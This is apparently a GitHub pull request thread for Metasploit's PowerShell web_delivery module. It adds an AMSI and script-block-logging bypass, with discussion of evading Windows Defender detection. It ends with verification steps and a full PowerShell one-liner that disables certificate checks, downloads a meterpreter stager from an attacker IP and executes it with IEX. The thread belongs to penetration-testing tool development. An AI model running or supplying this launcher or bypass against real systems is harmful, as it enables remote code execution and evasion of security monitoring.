Add support for AMSI/SBL bypass to PSH web_delivery #12446
Conversation
|
Looks good and the bypass is included in web_delivery. Is there an easy way of testing the effect on AMSI? It seems to work the same way before and after this change. |
|
Just to be clear I'm testing on Windows 10 x64, I think the Windows defender signatures were last updated in August. With Windows defender real time protection enabled web_delivery is detected as "TrojanDropper:PowerShell/Ploty.C" (perhaps because of the base64/gzip encoding?) both before and after this change. |
|
yeah i noticed too that recently something was changed with defender. i spent 5 hours yesterday implementing a launcher for the web delivery a là empire to then discover that something was detected in the randomcase version of the amsi bypass. however i found already a way to bypass it again but i think that we would need to ship the amsi bypass as first stage before any other code. it would be easy to attach it to the launcher command generated by the web delivery but atm the stager generated at the first request invokes powershell.exe again, making useless any prior bypass. i ended up digging into obfuscating the amsi bypass and prepending it to the stage2 but amsi was flagging some random case keywords.. the only way to make it work is to ship the amsi bypass alone at the beginning:
stage1 and stage2 must be executed separately, in the same powershell process, in this order. any idea how to ship separately the amsi bypass and/or how to disable the nested powershell.exe invocation? |
|
I think that's the technique used in unicorn: https://github.com/trustedsec/unicorn which bypasses AMSI for me (although meterpreter itself is still detected). |
|
Please see: phra/rex-powershell#2 |
|
@timwr i am going to check this PR in the following days, sorry for the delay. |
|
@timwr LGTM. i fixed something and now it's fully working for me. can you try it too? thanks. (requires rapid7/rex-powershell#19) |
|
i noticed that amsi/sbl bypass + msf stager, when |
|
|
|
with
|
|
fyi this works great with both encode_final_payload as true and false with Windows defender enabled and updated. |
Since `Powershell::encode_final_payload` and `Powershell::encode_inner_payload` are already used in `cmd_psh_payload`, so it's better to have a dedicated option for the encoded launcher.
remove unnecessary override
|
Awesome! |
Release NotesThis change adds support for a powershell AMSI bypass which enables the web_delivery module to bypass Windows defender on Windows 10. |
|
|
Related to rapid7/rex-powershell#17
Requires rapid7/rex-powershell#19
Verification
List the steps needed to make sure this thing works
msfconsoleuse exploit/multi/script/web_deliveryset payload windows/x64/meterpreter/reverse_httpsset LHOST ...set SSL trueexploit -jExample of generated command:
powershell.exe -nop -w hidden -c [Net.ServicePointManager]::SecurityProtocol=[Net.SecurityProtocolType]::Tls12;[System.Net.ServicePointManager]::ServerCertificateValidationCallback={$true};$A=new-object net.webclient;$A.proxy=[Net.WebRequest]::GetSystemWebProxy();$A.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $A.downloadstring('https://10.10.14.18:9999/UBbXnfVXjpR');